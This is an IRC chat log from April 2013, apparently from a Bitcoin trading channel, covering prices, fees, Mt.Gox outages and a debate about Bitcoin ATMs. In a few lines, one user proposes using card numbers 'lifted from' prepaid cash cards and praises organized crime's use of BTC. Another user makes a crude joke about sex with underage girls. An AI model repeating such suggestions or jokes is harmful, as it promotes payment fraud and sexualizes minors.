then bitcoin will really be at risk of being in a bubble Apr 04 17:09:27 ;;ticker Apr 04 17:09:28 BTCUSD ticker | Best bid: 136.53335, Best ask: 136.95000, Bid-ask spread: 0.41665, Last trade: 136.95000, 24 hour volume: 122772.25005439, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.78223 Apr 04 17:10:14 BTC would need to rise $4.7 per day to be $500 by June 20 Apr 04 17:10:56 June 21 Apr 04 17:10:58 er Apr 04 17:11:03 US summer Apr 04 17:11:54 ok middle of summer Apr 04 17:12:07 and 2.65 per day to be at $205 by may 1 Apr 04 17:12:56 "hour low: 110.00000, 24 hour high: 142.12000" Apr 04 17:13:07 I am interested in purchasing shares of companies which issue dividends in BTC. Has anyone else here done this? Apr 04 17:13:11 yes its entirely possible Apr 04 17:13:14 but too fast Apr 04 17:13:18 imo Apr 04 17:13:39 bitcoin_raider, yes Apr 04 17:13:54 but do your research Apr 04 17:14:06 and then do more Apr 04 17:14:20 good time to buy sdice Apr 04 17:14:26 undervalued IMO Apr 04 17:14:43 ThickAsThieves: thanks - I looked at sdice and their offering statement Apr 04 17:15:10 ASCIMINER Apr 04 17:15:23 Are there any businesses which you would invest in that aren't exclusivley based on bitcoin ecosystem? Apr 04 17:16:04 yes, they are listed on NASDAQ Apr 04 17:16:09 :) Apr 04 17:16:15 decent answer Apr 04 17:16:17 =) Apr 04 17:16:43 bitbet is starting to look interesting Apr 04 17:16:48 I own a business that sells physical things for both USD and BTC (we exhibit at defcon) and am considering trying to take it public on one of the BTC exchanges... I like the verified accounting it provides Apr 04 17:17:21 what do you sell Apr 04 17:17:29 RFID blcoking wallets Apr 04 17:18:32 what would I need to do/prove/etc to make a legit IPO offering. I see most just post their financials in a google doc Apr 04 17:18:42 but I don't seem to trust those Apr 04 17:19:25 do what you would want to see if YOU were an investor Apr 04 17:20:10 someone can link you to the MPOE-PR post Apr 04 17:20:14 blockchain stats ? Apr 04 17:20:35 elephants? Apr 04 17:21:21 ThickAsThieves: topace i got my withdrawl Apr 04 17:22:01 me too Apr 04 17:22:18 now just have to wait 5 years for it to confirm Apr 04 17:27:51 yeah, error4733 , it's not a why not as much as a why risk it Apr 04 17:29:07 peopl seriously need to start adding tx fees. Apr 04 17:29:13 what's this crazy stingyness Apr 04 17:30:05 looking forward to the day that companies are more focused on the product they make than the currency they use to finance their operations Apr 04 17:30:21 ^ Apr 04 17:30:22 it's a little gimmicky right now Apr 04 17:30:43 sorry mircea_popescu, i cut off your arrow Apr 04 17:30:55 no i just meant, yeah, me too. Apr 04 17:34:07 mp, i sent .001 btc fee for 10btc txn, took 9 hours for first confirm... we need a minimum fee schedule that people can choose to use or ignore. Apr 04 17:34:26 i didnt know .0015 was expected Apr 04 17:34:42 wat? .001 is slow now? Apr 04 17:34:51 i've been using .0006 Apr 04 17:35:14 i thought .0005 was good enough Apr 04 17:35:33 it's not like the miners are starving right now... Apr 04 17:35:37 deadweasely o.o Apr 04 17:35:47 this is insanity, my 0.001 stuff confirms next-block Apr 04 17:35:54 are you running a very isolated node ? Apr 04 17:36:15 I figure .0006 is just enough to beat S.DICE Apr 04 17:36:19 it has been slow even with tx fee Apr 04 17:36:25 fucking hell. Apr 04 17:36:26 dunno what topace includes Apr 04 17:36:32 boys, we're getting connectivity problems. it's not the fees Apr 04 17:36:36 the graph is splitting up ;/ Apr 04 17:36:48 miners fuckin shit up Apr 04 17:36:48 if you're in the wrong island and that island doesn't solve blocks you don;'t get in Apr 04 17:36:52 no, it's not the miners Apr 04 17:36:58 it's the nodes. too few nodes. argh Apr 04 17:37:29 jborkl are you getting anywhere with that network mapping thing ? **** BEGIN LOGGING AT Thu Apr 4 17:53:43 2013 Apr 04 17:58:17 at least bbet is back up :p Apr 04 17:59:15 http://www.thedailybeast.com/articles/2013/04/04/my-bitcoin-mis-adventure.html Apr 04 17:59:20 oh god please read it Apr 04 18:00:31 ok, i'll read it. Apr 04 18:01:14 oh man Apr 04 18:01:19 that's a really good one Apr 04 18:01:39 "But I press on, because my mercurial editor is emailing me, “When are you filing that bitcoin story!??” every five seconds." Apr 04 18:02:33 <[\\\]> awesome read Apr 04 18:02:43 <[\\\]> I seriously LOL Apr 04 18:02:46 Totally worth the $6.76, if you ask me. Apr 04 18:02:47 mkay Apr 04 18:03:18 "erotic self-hypnosis" < wtf is that ? Apr 04 18:03:51 can't tell if trolling or serious Apr 04 18:03:58 think that's what i like the most Apr 04 18:04:07 lol Apr 04 18:04:11 ya well done in that respek Apr 04 18:04:38 that guy should be here, someone invite him Apr 04 18:04:46 we need more dub in this chan. Apr 04 18:06:20 hey! he went with the cigar guys. nice. Apr 04 18:06:31 jcpham link guy i mena. Apr 04 18:06:37 mean. Apr 04 18:06:59 he discusses thing to do with bitcoins but makes himself out to be an idiot Apr 04 18:07:08 yes Apr 04 18:07:09 i like it Apr 04 18:07:12 self-effacing Apr 04 18:07:15 great tactic Apr 04 18:07:22 and he didn't sugarcoat anything Apr 04 18:07:46 good point of view of average guy trying to figure this out Apr 04 18:07:58 srsly someone drop him a webirc link to here Apr 04 18:08:08 which he did, which is a good sign. Apr 04 18:08:16 ;;ticker Apr 04 18:08:17 BTCUSD ticker | Best bid: 133.67978, Best ask: 134.49999, Bid-ask spread: 0.82021, Last trade: 134.49900, 24 hour volume: 128583.01835679, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 128.11103 Apr 04 18:08:50 if anyone's still under the misaprehension that mtgox sucking has anything to do with the dead rally... Apr 04 18:08:55 price's stable. mtgox is also stable. Apr 04 18:09:10 i thought you put the kibosh on that Apr 04 18:09:11 when raly bust people jumped on mtgox, it went to shit like it always does Apr 04 18:09:14 ddos mystery solved. Apr 04 18:09:25 ;) Apr 04 18:09:35 lol Apr 04 18:09:35 (which isn't to say they're not being hit, they are, but the two are unrelated) Apr 04 18:09:53 they truly were a victim of their own success...they can't tell page views from ddos... Apr 04 18:10:06 by that logic facebook is getting "DDOS'd" every day Apr 04 18:10:07 no it's just a convenient explanation you know ? Apr 04 18:10:18 well yeah Apr 04 18:10:23 "we had two issues. one is that we suck, the other is that we got ddosed" Apr 04 18:10:30 doesn't make the cut for the mtgox school of pr. Apr 04 18:10:32 hahhahas Apr 04 18:10:48 funny that they didn't go on bitcointalk to respond Apr 04 18:10:58 would have liked to see mpoe-pr get on that Apr 04 18:11:11 fucking ridiculous they're scared of her. Apr 04 18:11:15 what's she got on them, tits ? Apr 04 18:12:36 i certainly don't have tits like hers Apr 04 18:12:42 so i lose, i guess Apr 04 18:13:02 well yeah... you're not cool as t-bone Apr 04 18:13:25 heh, i'm poor, so i loose to t-bone Apr 04 18:13:56 you're poor now ?! Apr 04 18:14:05 what did you do, follow Bugpowder's investment advice ? Apr 04 18:14:08 are we talking about the same t-bone? Apr 04 18:14:22 tibanne Apr 04 18:14:39 ah, not at all Apr 04 18:15:01 oh yeah, you ignored the t-bone i was thinking of Apr 04 18:15:08 o ? Apr 04 18:15:11 https://www.tibanne.com/ << if anyone missed this. Apr 04 18:15:20 Our services Apr 04 18:15:20 01. shot.dns.st: create screenshots of websites Apr 04 18:15:20 03. NoSpam.st: create temporary email Apr 04 18:15:20 05. fullXP: professional streaming Apr 04 18:16:34 you missed the link factory and irc net Apr 04 18:16:48 kakobrekla https://bitcointalk.org/index.php?topic=141458.msg1740085#msg1740085 Apr 04 18:16:57 what am i telling the girl to tell him ? hm ? HM ?!?!?!?!?! Apr 04 18:17:11 smickles my bad Apr 04 18:17:29 luckily with [\\\] on mpex' side we outinovate tibanne, the irc net providers. Apr 04 18:20:55 smickles: you meant tiberiusiv right? Apr 04 18:21:10 o did you ? totally missed it lol. Apr 04 18:21:32 hey, is copumpkin's irl pw:rn actually pebbles ?! what sorcery is this! Apr 04 18:21:34 MJR_: yup Apr 04 18:22:38 i was going to pay off my car loan with bitcoin, but they'll only take usd, so i have to sell the btc first Apr 04 18:22:47 too bad Apr 04 18:22:49 <[\\\]> bitpay! Apr 04 18:23:42 i was gonna pay my rent in chocolate Apr 04 18:23:45 [\\\]: sry, i sold ~20kusd worth at 140 Apr 04 18:23:55 but the landlady was only taking currency so we just ate the chocolate and then made out. Apr 04 18:24:12 <[\\\]> nice Apr 04 18:24:32 <[\\\]> http://money.cnn.com/2013/04/04/investing/bitcoin-atms/ Apr 04 18:24:42 <[\\\]> made the cnn front page Apr 04 18:25:07 that shit coming soon since jan Apr 04 18:25:34 man, yeah Apr 04 18:26:48 bitcoin ATM just seems awkward to me... Apr 04 18:27:44 i bet they'd work on college campuses Apr 04 18:28:03 i kinda want to convince a collections attorney to accept btc as payment for credit card collections Apr 04 18:28:08 seems elegantly backwards Apr 04 18:28:23 i agree... Apr 04 18:28:33 lol elegantly backwards Apr 04 18:28:36 the world really needs that type of irony Apr 04 18:28:39 you people are s o anal, you know that ? Apr 04 18:28:50 call me a luddite, but I just don't get it... Apr 04 18:28:54 i love anal Apr 04 18:28:58 <[\\\]> mircea_popescu, no, thats illegal Apr 04 18:29:21 [\\\] maybe where you live. over here it's mandatory for underage females. Apr 04 18:29:25 what the fuck is this you people shit Apr 04 18:29:37 heh Apr 04 18:29:56 con·de·scend Apr 04 18:29:56 Verb Apr 04 18:29:56 Show feelings of superiority; patronize. Apr 04 18:29:56 Do something in a haughty way, as though it is below one's dignity or level of importance. Apr 04 18:30:10 <[\\\]> superiority complex Apr 04 18:30:12 <[\\\]> it happens Apr 04 18:30:15 jcpham i just thought you're legion. Apr 04 18:30:25 trolololo Apr 04 18:30:39 also note that people does not have a singular. but if you prefer i'll refer to you as "you peopl" in the future. Apr 04 18:30:45 i'm pretty sure i've never said "you people" Apr 04 18:30:53 too much time spent with mpoe-pr Apr 04 18:30:57 <[\\\]> heh Apr 04 18:30:59 now that may be. Apr 04 18:31:04 <[\\\]> gota jet Apr 04 18:31:05 tact. Apr 04 18:31:19 she sucks the tact right out of ya, true. Apr 04 18:31:24 the atm finally solves liquidity Apr 04 18:31:37 what do you do at a store that doesn't accept credit cards? Apr 04 18:31:39 c'mon Apr 04 18:31:39 same shit Apr 04 18:31:49 MJR_ chocolate coins! Apr 04 18:31:50 you run across the street to an atm Apr 04 18:31:51 get cash Apr 04 18:32:04 this is normal and everyday stuff Apr 04 18:32:21 bitcoin ATM = jump the shark Apr 04 18:32:34 huh? i need to be able to spend my money... Apr 04 18:32:51 think of bitcoin as a credit card like discover which no one takes Apr 04 18:33:07 so i am going to need to get cash at times Apr 04 18:33:12 but i don't want to HOLD cash Apr 04 18:33:17 i just want to SPEND cash Apr 04 18:33:48 this is so obvious and simple of an idea that i can't even see why there would be a debate Apr 04 18:34:00 like i'm starting a bank, we don't need atm's? Apr 04 18:34:27 its way more convenient to engage in trading online when i want to get a jameson and hang out Apr 04 18:34:40 i also love the week wait for the cash Apr 04 18:34:43 they are going to have the same sorts of problems that coinbase has... Apr 04 18:34:48 no Apr 04 18:34:52 they won't if they are smart Apr 04 18:35:01 theirs goes both ways Apr 04 18:35:10 so they can replenish cash Apr 04 18:35:13 <[\\\]> right Apr 04 18:35:13 without getting more cash Apr 04 18:35:28 because you are actually providing a means for me to transfer all my fiat into btc Apr 04 18:35:36 whenever i need to spend, i just withdraw Apr 04 18:35:43 whenever i get paid, i just deposit Apr 04 18:35:53 simple Apr 04 18:36:01 bitcoin will never take over every transaction Apr 04 18:36:04 nor should it Apr 04 18:36:09 let cash do what its good at Apr 04 18:36:15 let bitcoin do what it's good at Apr 04 18:36:28 get out of here you sensible fuck! Apr 04 18:36:33 lol Apr 04 18:36:39 smickles: you are the best Apr 04 18:36:44 ;D Apr 04 18:36:52 I do try from time to time. Apr 04 18:37:08 the point is that eventually bitcoin should not be a novelty Apr 04 18:37:17 it should just be an everyday fact of life that fades into the background Apr 04 18:37:24 <[\\\]> should it? Apr 04 18:37:37 yes...did you read the daily beast? Apr 04 18:37:46 <[\\\]> I've read a bunch of articles Apr 04 18:37:49 no one ever will go through that shit unless they are writing an article Apr 04 18:37:55 i hear your arguments, but my gut tells me that it probably won't work as smoothly as one would hope and the logistics will be a problem Apr 04 18:38:01 <[\\\]> aye Apr 04 18:38:10 <[\\\]> just wiat until a government decides it doesn't like it Apr 04 18:38:10 ...its already been done Apr 04 18:38:10 what about fees? and conversion rates? Apr 04 18:38:11 it will take 25 years plus for it to fade Apr 04 18:38:29 that is just algorithms...atm's are already connected to the network by design Apr 04 18:38:43 in fact, mircea_popescu had a great article called "the magic money machine" Apr 04 18:38:45 3% fee, used the 24h weighted avg Apr 04 18:38:47 which basically speaks to this Apr 04 18:39:16 yeah, withdrawal get less dollars, deposit get less bitcoins Apr 04 18:39:20 if you really want to get fancy, use 3% minimum, and raise it based on the latest standard deviation Apr 04 18:39:22 but unparralleled convenience Apr 04 18:39:37 a bitcoin ATM assumes that there is a market for people who want to constantly transact between fiat and bitcoin - those people will be sensitive to the exchange rate and fees Apr 04 18:40:21 this is my ultimate long term vision of the system of the world...atm's everywhere that run mining nodes in a pool, they connect to an exchange and automatically buy and sell based on the demand...once it scales up, you will have a HUGE stabilizing influence Apr 04 18:40:32 i think the atm is for Convenience Apr 04 18:40:37 exactly Apr 04 18:40:42 i want to buy a burger Apr 04 18:40:48 i'm not withdrawing my life savings Apr 04 18:40:55 but i need to get $20 out of a hot wallet Apr 04 18:41:01 atm is also for people who somehow think itll be easier to buy bitcoin there than on the interweb Apr 04 18:41:02 without doing ACH transfer Apr 04 18:41:08 cart before the horse... Apr 04 18:41:12 well...that makes it super easy Apr 04 18:41:26 if a lot of people want to BUY bitcoins...i can buy them on the exchanges automatically Apr 04 18:41:28 and sell them Apr 04 18:41:34 while they refill my atm's for me Apr 04 18:41:53 look, no bank ever said "hey, let's get ONE ATM...that should be enough" Apr 04 18:41:53 so long as gox is at the center of it - it will be a costly investment for first round funding guys... Apr 04 18:42:03 gox won't be Apr 04 18:42:06 of course Apr 04 18:42:10 with that kind of liquidity Apr 04 18:42:15 you will surpass gox Apr 04 18:42:34 a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 04 18:42:42 403,000 ATMs in the US Apr 04 18:42:48 exactly Apr 04 18:42:51 it is convenient Apr 04 18:42:59 people pay 4% currently for bitinstant Apr 04 18:43:06 cheaper, easier and faster Apr 04 18:43:36 and most people won't be cashing out their whole savings...they want spending money and to let their wealth remain in bitcoins Apr 04 18:43:40 but people who use bitinstant are repeat users in/out... they'd go broke... Apr 04 18:43:47 aren't, rather Apr 04 18:43:57 well...you set the fees where it makes sense Apr 04 18:44:04 at the end of the day...how do banks do it now Apr 04 18:44:12 its obviously possible to run an atm network Apr 04 18:44:14 its been done Apr 04 18:44:23 if bitcoin can't handle something that basic and mundane Apr 04 18:44:47 they're asking to be regulated... Apr 04 18:44:48 the thing i'm talking about is the most basic of banking needs Apr 04 18:44:53 deposit withdrawal Apr 04 18:45:02 [HAVELOCK] [SDICE] 1 @ 0.35579999 BTC [+] Apr 04 18:45:05 in fact...you could even set it up as an ewallet service if you would rather go that way Apr 04 18:45:11 and have accounts with fiat and btc etc Apr 04 18:45:24 but you can accept cash with no friction besides being close to an atm Apr 04 18:46:02 [HAVELOCK] [SDICE] 4 @ 0.356 = 1.424 BTC [+] Apr 04 18:46:06 most people have brokerage accounts - why can't you access those directly through an ATM? Apr 04 18:46:20 no demand Apr 04 18:46:20 THAT is the point Apr 04 18:46:30 as long as bitcoin is a speculative asset Apr 04 18:46:35 it won't win Apr 04 18:46:42 when it becomes a currency, it wins easiliy Apr 04 18:46:44 etrade tried it - no demand Apr 04 18:46:51 most people don't want to trade Apr 04 18:46:58 they just want honest money, available when they want Apr 04 18:47:12 if it holds its value and they can have it on demand, they are happy Apr 04 18:47:13 people are used to managed the fiat equivalent of cold and hot wallets Apr 04 18:47:15 In effect the ATMs are just there to beat the x*10 min confirmations no ? is there no better way of doing that ? Apr 04 18:47:36 that is the point, you don't need to see btc as an INVESTMENT Apr 04 18:47:39 if the need cash, they keep money in there checking account linked to a card.. Apr 04 18:47:46 most people who spend money don't think of it as a forex transaction Apr 04 18:47:52 otherwise they keep it elsewhere Apr 04 18:48:00 yes, but what about people who don't want to keep their money in USD Apr 04 18:48:02 [HAVELOCK] [SDICE] 1 @ 0.35799996 BTC [+] Apr 04 18:48:03 [HAVELOCK] [SDICE] 2 @ 0.35799996 = 0.716 BTC [+] Apr 04 18:48:12 you unlock gresham's law through this method Apr 04 18:48:22 no sdice dividend announcement yet ? Apr 04 18:48:24 i only have to spend the "bad" currency when i really need to Apr 04 18:48:36 otherwise i have only "good" currency Apr 04 18:48:59 the point is that as long as btc is only good for finance people, you won't get mainstream adoption Apr 04 18:49:03 look - I'm not saying that that sort of convenience is bad... Apr 04 18:49:13 I just question the timing and business model Apr 04 18:49:22 i never gave a time frame... Apr 04 18:49:33 i just said that giving people easy access to their cash is necessary Apr 04 18:49:39 what is the problem with gox? Apr 04 18:49:43 lag on setting up account Apr 04 18:49:47 lag on withdrawing money Apr 04 18:49:51 lag on executing trades Apr 04 18:49:54 or in other words Apr 04 18:49:57 inconvenience Apr 04 18:49:59 in the future, there will be no cash Apr 04 18:50:08 if you are curious about the market...check out localbitcoins Apr 04 18:50:10 surely a better way to access a local currency would be something like mpesa no ? Apr 04 18:50:17 see what they go for in a more convenient environment Apr 04 18:51:03 [HAVELOCK] [VTX] 1 @ 0.4449 BTC [+] Apr 04 18:51:33 anywhere from $145-191 Apr 04 18:51:46 thats why bitfloor has higher prices Apr 04 18:51:52 etc etc etc Apr 04 18:52:02 [HAVELOCK] [VTX] 1 @ 0.445 BTC [+] Apr 04 18:52:07 I just don't see it being a profitable venture for these guys - that's all... Apr 04 18:52:13 i suppose Apr 04 18:52:17 i don't see how they can lose money Apr 04 18:52:23 besides being idiots Apr 04 18:52:32 barring theft, they cannot lose money Apr 04 18:52:38 massive up front costs Apr 04 18:52:51 you are charging more to buy and giving less out to sell...it is automatically buy low sell high Apr 04 18:53:02 [HAVELOCK] [VTX] 1 @ 0.445 BTC [+] Apr 04 18:53:03 [HAVELOCK] [VTX] 50 @ 0.445 = 22.25 BTC [+] Apr 04 18:53:10 yeah Apr 04 18:53:11 true Apr 04 18:53:16 but bitcoin millionaires don't mind Apr 04 18:53:56 they way it SHOULD progress is like this...you convince a local shop to accept bitcoins and put your atm inside their shop Apr 04 18:53:58 [BTCTC] [BITVPS] 15 @ 0.0028 = 0.042 BTC [-] Apr 04 18:54:02 [HAVELOCK] [VTX] 3 @ 0.449 = 1.347 BTC [+] Apr 04 18:54:05 that is your omaha beach Apr 04 18:54:10 for the city in question Apr 04 18:54:27 you try to draw all enthusiasts to this shop and try to get other local businesses in this neighborhood to accept it Apr 04 18:54:35 i'm looking at williamsburg Apr 04 18:54:47 you create enough local economy to create critical mass Apr 04 18:54:58 eventually maybe a few landlords accept rent in btc Apr 04 18:55:03 a grocery store Apr 04 18:55:17 and you form an "ethnic" enclave Apr 04 18:55:27 like chinatown or koreatown or little italy etc Apr 04 18:55:42 'cept its a "economic" enclave Apr 04 18:56:28 this is how immigrants do it, and have done it for hundreds of years, and its how they survive and make it in a foreign land Apr 04 18:56:36 stick together Apr 04 18:56:54 common culture, and community trust Apr 04 18:57:03 obviously, I believe in bitcoin... I just don't see that happening anytime soon... in 10 years... Apr 04 18:57:18 maybe...you'd be surprised how quickly hipsters can adopt new things Apr 04 18:57:24 you wanna go to lunch by the way? Apr 04 18:57:38 bitcoin's principal utility is in the NON-local transfer of money Apr 04 18:57:53 hmmm...strong point Apr 04 18:57:57 wish i could Apr 04 18:57:59 but i think it's in its store of value Apr 04 18:58:16 BoJ just decided to double its bond buyback rate... Apr 04 18:58:34 and the genesis block did not contain a message saying "money hard to move to other countries" Apr 04 18:58:50 fine... store of value... there is no demand for ATM access to your investments... Apr 04 18:59:10 [MPEX] [S.MPOE] 13770 @ 0.00071031 = 9.781 BTC [+] Apr 04 18:59:10 but if i could have all my wealth in my "investments"...and only liquidate when i had to Apr 04 18:59:18 literally at the point of sale Apr 04 18:59:23 it is preferable Apr 04 18:59:40 if people wanted that, we would have that already Apr 04 18:59:56 if people wanted bitcoin we would have had it already...glad satoshi didn't think that Apr 04 19:00:15 there will be surprises and there will be many things that change Apr 04 19:00:28 ipad is anohter good example, et al Apr 04 19:00:59 i'm just saying...access to your money is important Apr 04 19:01:11 not every problem has a bitcoin solution Apr 04 19:01:22 i totally agree Apr 04 19:01:36 which is why i need a way to move my wealth from bitcoin to cash immediately and at will Apr 04 19:01:45 and then move it back again Apr 04 19:01:50 this volatility won't be foreveer Apr 04 19:02:01 you say ten years...i say 3 Apr 04 19:02:06 topace not that i've seen. Apr 04 19:02:09 just a difference in pace at the end of the day Apr 04 19:02:44 mircea_popescu: how do these atm's relate to your "magic money machines"? Apr 04 19:03:09 i think i was saying they're basically the reverse Apr 04 19:03:25 Business as usual and the world moves on http://www.foxbusiness.com/technology/2013/04/04/bitcoin-exchange-bombarded-by-another-massive-cyber-attack/ Apr 04 19:03:29 not quite sure why people would do it backwards Apr 04 19:03:31 explain? Apr 04 19:03:42 since the transactions are both ways how is it the reverse? Apr 04 19:03:46 well, they want to make bitcoin vending machines ? Apr 04 19:03:50 or i confuse two projects ? Apr 04 19:03:55 a ? Apr 04 19:04:00 no...they can dispense cash OR bitcoins Apr 04 19:04:02 [HAVELOCK] [VTX] 1 @ 0.445 BTC [-] Apr 04 19:04:05 and accept cash or bitcoins Apr 04 19:04:08 well then... exactly it :D Apr 04 19:04:14 thanks :) Apr 04 19:04:24 if they execute (a HUGE if) it would be great Apr 04 19:04:27 indeed. Apr 04 19:04:32 and pgp is right Apr 04 19:04:40 i doubt they will really execute it, Apr 04 19:04:49 as running the cash ops is the most expensive part of retail banking Apr 04 19:04:54 in the fact that again, the real world has a way of messing software guys plans up Apr 04 19:05:01 and they absolutely can't afford the human resources let alone the capital goods Apr 04 19:05:01 yes... Apr 04 19:05:02 but hey... Apr 04 19:05:05 yes! Apr 04 19:05:08 kids wanna try the impossible, let them. Apr 04 19:05:13 hahaha Apr 04 19:05:18 you start small Apr 04 19:05:24 no, you don't. Apr 04 19:05:30 if you want to get laid you don't start with a shrimp Apr 04 19:05:37 and i think the scarcity of bitoin right now means you will get more cash put in than taken out Apr 04 19:05:49 it's a problem either way Apr 04 19:05:51 i mean PoC one atm somewhere by your own house Apr 04 19:06:01 and an armored truck costs as much as an oil tanker, 20k a day Apr 04 19:06:34 they don't send armored trucks for all of them...i mean the small atms...the kind you find in a deli not affiliated with a bank Apr 04 19:06:48 are they really executing or sorta executing ? Apr 04 19:06:48 idea is TOO EARLY... Apr 04 19:07:05 send a little armored roboaspirator guy Apr 04 19:07:06 but we'll be able to learn from their mistakes... Apr 04 19:07:07 start small. Apr 04 19:07:25 http://www.atmnetwork.net/store/#ecwid:category=1438203&mode=product&product=21968297 Apr 04 19:07:27 like that Apr 04 19:07:52 they don't have armored trucks coming for that...and of course i'd limit it to $20 bills only...in and out Apr 04 19:08:24 not that it counts a lot...but they were interviewed on cnbc, they have preorders in 30 countries already Apr 04 19:08:36 and have the prototype Apr 04 19:08:54 so whether THEY succeed or fail does not speak to whether the idea succeeds or fails IMO Apr 04 19:10:18 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CDIQFjAA&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FJeff_Berwick&ei=36VdUaL4Cuuo0AHlxICIDA&usg=AFQjCNEW4ScEXrdgn7x9fyMdLbP3WQp5bg&sig2=9IihRHrzALlXc_8Y4Ukstw Apr 04 19:11:17 if gox got a banking license, they could issue debit cards that could be used at every atm in the world - that you be a problem for bitcoin ATM Apr 04 19:11:31 https://bitcoinatm.com/ Apr 04 19:11:39 there is his site if you want to look yourself Apr 04 19:11:41 pgp it would have been the logical step for them. Apr 04 19:11:48 it is beyond the pale that they did not do so. Apr 04 19:12:01 i believe there is already a bank in france that lets people maintain BTC balances... yes? Apr 04 19:12:04 i had originally thought there's under the table conventions preventing such a thing, even if not visible above board Apr 04 19:12:14 if they can manage to stem the flow of p0eople sick of doing business there...build a decent matching engine...then they can hope to develop atm technology lol Apr 04 19:12:16 but once the frenchies did get it... it's clearly just op incompetence. Apr 04 19:13:30 yah, i think he is trying to set up the first two atm's within the next two weeks..so we'll see Apr 04 19:14:11 at the end of the day, if you can't even handle data...please for the love of god don't try and tackle hardware or supply chain management (looking at you BFL) Apr 04 19:15:05 do the atms go both ways? cash for btc and btc for cash? Apr 04 19:15:12 yes Apr 04 19:15:13 they do Apr 04 19:15:14 if your a bank, you don't need to develop ATM technology Apr 04 19:15:20 i'm going to lunch with darren pgp Apr 04 19:15:23 you use the existing network Apr 04 19:15:34 also...last point, if it existed i would be using it today Apr 04 19:15:39 so they'd have one customer Apr 04 19:15:53 mjr - wish I could join - have work to do :-( Apr 04 19:17:44 i think there's a bitbet on it anyway Apr 04 19:17:59 consider a hardware widget that receives a single-use CC number (for $X) from a hypothetical BTC-enabled bank and writes it to a blank physical ATM card, when you send the bank $X equiv. of BTC. Apr 04 19:18:08 then you can withdraw cash from normal ATMs. Apr 04 19:18:30 let some other loser handle the ATMs, drive the armored trucks, etc. Apr 04 19:18:37 asciilifeform this will never fly. Apr 04 19:19:00 not in the USSA certainly. but maybe in France... Apr 04 19:19:03 not even Apr 04 19:19:11 you'll get shot down, specifically for the "other loser" reason Apr 04 19:19:50 what does it take to get valid single-use CC #s, though? Can you do it from the Seychelles or the like? Apr 04 19:19:57 not even in russia will you be able to suck the value out of their infrastructure quite so brazenly Apr 04 19:20:07 you can do it until they figure out what you're doing it for. Apr 04 19:20:07 but I agree, anyone who tries will "have problems" rather quickly. Apr 04 19:20:23 btw, thanks for your microscope. Apr 04 19:20:55 mircea_popescu: thank Alex Tolstoy, not me. Apr 04 19:21:30 what do i care where you stole it from Apr 04 19:21:31 mircea_popescu: what made you remember it now? Apr 04 19:21:33 i stole it from you Apr 04 19:21:44 http://trilema.com/2013/people-bitcoin-is-not-worth-100-dollars-per-stop-buying/ Apr 04 19:21:59 bah wrong link. i meant http://trilema.com/2013/its-been-an-epic-few-days-what-happened/ Apr 04 19:22:01 you're in there. Apr 04 19:23:48 mircea_popescu: ok I see Apr 04 19:24:03 [HAVELOCK] [VTX] 2 @ 0.4492 = 0.8984 BTC [+] Apr 04 19:24:36 ;;ticker Apr 04 19:24:39 BTCUSD ticker | Best bid: 133.40000, Best ask: 133.86743, Bid-ask spread: 0.46743, Last trade: 133.86744, 24 hour volume: 124844.76506536, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.81081 Apr 04 19:25:44 "can we use the coffee fund to buy other stuff ?" "like what" "ummm like say beer" "no. coffee fund is for coffe funding.". net result ? https://bitcointalk.org/index.php?topic=166794.msg1740750#msg1740750 Apr 04 19:26:31 another variation on the CC idea: use #s lifted from perfectly genuine "cash cards," of the kind sold in virtually every country. Apr 04 19:26:48 are you trying to cause a bitcoin-related successful prosecution ? Apr 04 19:27:43 the BTC prosecutions (and firing squads, eventually) will come whether we like it or not. Apr 04 19:28:04 no they won't, get out. Apr 04 19:28:11 IANAL, but I'm not even sure this would be illegal under (current) American law. Apr 04 19:29:10 although the U.S. authorities are in the process of decreeing that cash card balances must be declared at customs checkpoints. Apr 04 19:29:59 listen, keeping piss in milk containers in your fridge may not be specifically against the rules of your lease Apr 04 19:30:08 but after a few neighbougrs accidentally drink some you will get evicted. Apr 04 19:30:29 just shitty non-scalable sorts of things to do. Apr 04 19:31:11 <[\\\]> that's why you label the milk containers piss Apr 04 19:31:19 mircea_popescu: fair enough. If you screw with the "cattle infrastructure" you will Have Problems, whether it breaks any formal law or not. Apr 04 19:31:45 [BTCTC] [ASICMINER-PT] 1 @ 0.7699 BTC [+] Apr 04 19:31:48 mircea_popescu: I was arguing from the "may as well hang for a sheep as a lamb" angle. Apr 04 19:31:59 ya but it's not what's going on here. Apr 04 19:32:04 nobody's hanging you. Apr 04 19:32:17 so far the govt is a coughar in your little corner bar drooling all over you. Apr 04 19:32:28 she ain't strangling anything. Apr 04 19:32:31 much. Apr 04 19:35:02 [HAVELOCK] [VTX] 4 @ 0.4492 = 1.7968 BTC [+] Apr 04 19:35:40 I know this is a hard sell, but it seems to me that things like Silk Road are steps in the right direction. Right now, most BTC users are law-abiding wimps who will give up if their gov. so much as sneezes at them. But if you can get organized crime to actually rely on BTC in a serious way, it will be invincible. Apr 04 19:36:08 what the hell. law abiding isn't being a whimp, in the vast, overwhelmingly majority of cases. Apr 04 19:36:23 what, drive on the other side of the road just to be different ? Apr 04 19:36:27 ok, strike that. "decree-abiding" Apr 04 19:36:45 but see, the way to efficiently fight absurd regulation is by keeping the obnoxious shit to a minimum. Apr 04 19:37:03 if you're not the weird guy with piss in your fridge you have a much better shot at getting gays accepted in the condo. Apr 04 19:37:05 right now, if the legit commerce in BTC gets decreed out of existence, the currency will be on very shaky legs indeed Apr 04 19:37:29 yeah, right, becauyse a whole 50 dollars in reddit tips and another 100 bux in coffe is going away. Apr 04 19:37:30 derp. Apr 04 19:38:07 forget about reddit coffee, what about mtgox? what would a sudden desaparecido of gox be like? Apr 04 19:38:15 [MPEX] [S.DICE] 1000 @ 0.00333 = 3.33 BTC [+] Apr 04 19:38:21 what'd happen if california fell into the ocean ? Apr 04 19:38:37 the us minus a buncha freaks would still be fighting in afghanistan right ? Apr 04 19:39:56 correct me if I'm wrong, but most people who pump fiat into BTC are hoping to use gox in particular at some point to pump it back out Apr 04 19:40:32 btc is people moving 10k btc over a nod and a handshake, not 10k noobs putting in 50 bux they "earned online" to "get in on the ground floor" on this "new thing" Apr 04 19:41:15 or currency imo because i dont think the design can handle transactions required of a common currency Apr 04 19:41:44 my impression is that the idiot noobs are playing 